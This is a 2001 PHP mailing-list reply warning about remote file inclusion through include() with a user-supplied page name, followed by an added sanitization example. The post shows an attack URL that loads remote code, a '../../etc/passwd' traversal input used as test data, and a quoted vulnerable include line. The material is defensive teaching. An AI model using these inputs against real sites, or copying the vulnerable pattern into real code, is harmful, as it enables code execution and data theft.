Be very careful with this construct.  It is generally a bad idea to do any
sort of file opening/loading where the file name comes directly from user
input.

If you were naive enough to use this line:

include("$page.txt");

I could call your php script with ?page=http://mysite.com/dumpyourdatabase

PHP would then load and execute something like this:

http://mysite.com/dumpyourdatabase.txt

An entry could be added to the MySQL.User table from the code in this script
allowing remote access or many other things.

If you decide you really want something like this, it would be a great idea
to run a regular expression on $page and erase any non-letter characters.

Also, as a general reminder, make sure your database permissions are set up
properly for the MySQL user your database is running under (generally they
should not have access to the MySQL table, and only be allowed to
insert/select/update to the database the website works with).

Jon Snell
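
An added example (not code from this thread) of the clean-up suggested above: erase every non-letter from $page, then confirm the resulting file really exists inside the page directory before reading it. The function name page_path(), the temporary directory and the sample inputs are constructed for illustration; PHP 7.1 or later is assumed.

```php
<?php
// Added example; page_path() is a hypothetical helper, not from the thread.

// Map an untrusted page name to an existing file under $dir, or null.
function page_path(string $page, string $dir): ?string
{
    // Erase every non-letter. This drops ':', '/', '.' and NUL bytes,
    // so neither a URL nor a "../" sequence survives.
    $name = preg_replace('/[^A-Za-z]/', '', $page);
    if ($name === null || $name === '') {
        return null;
    }

    $base = realpath($dir);
    $path = realpath("$dir/side_$name.txt");

    // realpath() returns false for a missing file. The prefix check is
    // defence in depth against a symlink that points outside $dir.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo data: one legitimate page in a temporary directory.
$dir = sys_get_temp_dir() . '/pages_' . bin2hex(random_bytes(4));
mkdir($dir);
file_put_contents("$dir/side_news.txt", "News page\n");

// Constructed inputs: one valid name, the URL from the message above,
// a traversal attempt and an empty value.
$inputs = ['news', 'http://mysite.com/dumpyourdatabase', '../../etc/passwd', ''];
foreach ($inputs as $page) {
    $path = page_path($page, $dir);
    if ($path === null) {
        echo 'rejected: ', var_export($page, true), "\n";
    } else {
        // readfile() only outputs the text; unlike include(), it never
        // executes the file's contents as PHP.
        readfile($path);
    }
}

unlink("$dir/side_news.txt");
rmdir($dir);
```

Only the first input resolves to a file; the other three are rejected because the cleaned name is empty or matches no file in the directory.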

-----Original Message-----
From: Nick Norton [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, March 06, 2001 3:57 PM
To: [EMAIL PROTECTED]
Subject: RE: [PHP] Please Help!!!! - Really BASIC stuff!


Just put the following instead of a long switch and keep your file naming
conventions consistent

include("side_$page.txt");


--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, e-mail: [EMAIL PROTECTED]
For additional commands, e-mail: [EMAIL PROTECTED]
To contact the list administrators, e-mail: [EMAIL PROTECTED]


